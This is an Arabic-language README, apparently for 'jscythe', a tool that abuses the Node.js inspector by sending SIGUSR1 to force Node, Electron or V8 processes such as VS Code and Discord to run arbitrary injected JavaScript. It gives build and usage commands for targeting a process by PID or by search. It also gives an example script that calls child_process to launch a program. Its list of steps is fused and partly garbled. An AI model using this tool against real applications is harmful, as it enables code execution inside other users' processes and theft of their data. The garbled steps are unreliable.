
استغلال آلية المفتش (inspector) في node.js لإجبار أي عملية قائمة على node.js/electron/v8 على تنفيذ كود جافاسكريبت عشوائي.
jscythe يساء استخدام آلية المفتش في node.js لإجبار أي عملية مبنية على node.js/electron/v8 على تنفيذ كود جافاسكريبت تعسفي، حتى إذا كانت قدرات التصحيح لديهم معطلة.

تم اختباره ويعمل ضد Visual Studio Code و Discord وأي تطبيق Node.js والمزيد!
SIGUSR1 إلى العملية، مما سيمكن المصحح على منفذ (يعتمد على البرنامج، أحيانًا يكون عشوائيًا، وأحيانًا لا).SIGUSR1.http://localhost:<port>/json.Runtime.evaluate مع الكود المقدم.cargo build --release
استهداف عملية محددة وتنفيذ تعبير أساسي:
./target/release/jscythe --pid 666 --code "5 - 3 + 2"
تنفيذ كود من ملف:
./target/release/jscythe --pid 666 --script example_script.js
يمكن لـ example_script.js استدعاء أي وحدة node وتنفيذ أي كود، مثل:
require('child_process').spawnSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator', { encoding : 'utf8' }).stdout
البحث عن عملية بواسطة تعبير:
./target/release/jscythe --search extensionHost --script example_script.js
شغل jscythe --help للحصول على القائمة الكاملة للخيارات.
هذا المشروع صنع بـ ♥ بواسطة @evilsocket وهو مصدر تحت رخصة GPL3.